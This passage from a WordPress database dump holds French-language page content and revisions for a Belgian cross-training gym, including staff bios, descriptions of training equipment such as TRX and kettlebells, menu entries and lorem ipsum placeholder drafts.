(479, 1, '2015-04-21 09:39:41', '2015-04-21 09:39:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n        <li>Formation Personal Trainer (Parnasse)</li>\r\n	<li>Formation Les mills Coach BodyBoxe</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:39:41', '2015-04-21 09:39:41', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(21, 1, '2013-05-24 14:33:45', '2013-05-24 14:33:45', '', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-05-24 14:33:45', '2013-05-24 14:33:45', '', 20, 'http://www.crosstrainingcenter.be/?p=21', 0, 'revision', '', 0),
(22, 1, '2013-05-24 14:34:07', '2013-05-24 14:34:07', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'publish', 'closed', 'open', '', 'le-cross-training', '', '', '2013-11-04 17:38:54', '2013-11-04 17:38:54', '', 0, 'http://www.crosstrainingcenter.be/?page_id=22', 0, 'page', '', 0),
(23, 1, '2013-05-24 14:34:02', '2013-05-24 14:34:02', '', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:34:02', '2013-05-24 14:34:02', '', 22, 'http://www.crosstrainingcenter.be/?p=23', 0, 'revision', '', 0),
(24, 1, '2013-05-24 14:34:58', '2013-05-24 14:34:58', ' ', '', '', 'publish', 'open', 'open', '', '24', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=24', 2, 'nav_menu_item', '', 0),
(25, 1, '2013-05-24 14:34:58', '2013-05-24 14:34:58', '', 'L\'équipe', '', 'publish', 'open', 'open', '', 'lequipe', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=25', 6, 'nav_menu_item', '', 0),
(26, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 9, 'http://www.crosstrainingcenter.be/?p=26', 0, 'revision', '', 0),
(27, 1, '2013-05-24 14:33:49', '2013-05-24 14:33:49', 'blabla', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-05-24 14:33:49', '2013-05-24 14:33:49', '', 20, 'http://www.crosstrainingcenter.be/?p=27', 0, 'revision', '', 0),
(28, 1, '2013-05-24 14:34:07', '2013-05-24 14:34:07', 'définition, historique', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:34:07', '2013-05-24 14:34:07', '', 22, 'http://www.crosstrainingcenter.be/?p=28', 0, 'revision', '', 0),
(29, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 11, 'http://www.crosstrainingcenter.be/?p=29', 0, 'revision', '', 0),
(30, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 5, 'http://www.crosstrainingcenter.be/?p=30', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(32, 1, '2013-07-10 16:11:47', '2013-07-10 16:11:47', '<blockquote>\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\n</blockquote>\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\n<h2></h2>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>TRX Suspension Training</h1>\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>Kettlebell</h1>\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>ViPR</h1>\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>RIP Trainer</h1>\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-autosave-v1', '', '', '2013-07-10 16:11:47', '2013-07-10 16:11:47', '', 22, 'http://www.crosstrainingcenter.be/?p=32', 0, 'revision', '', 0),
(31, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 9, 'http://www.crosstrainingcenter.be/?p=31', 0, 'revision', '', 0),
(40, 1, '2013-06-16 08:02:41', '2013-06-16 08:02:41', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2><b>TRX Suspension Training </b></h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2><b>Kettlebel</b></h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2><b>ViPR</b></h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
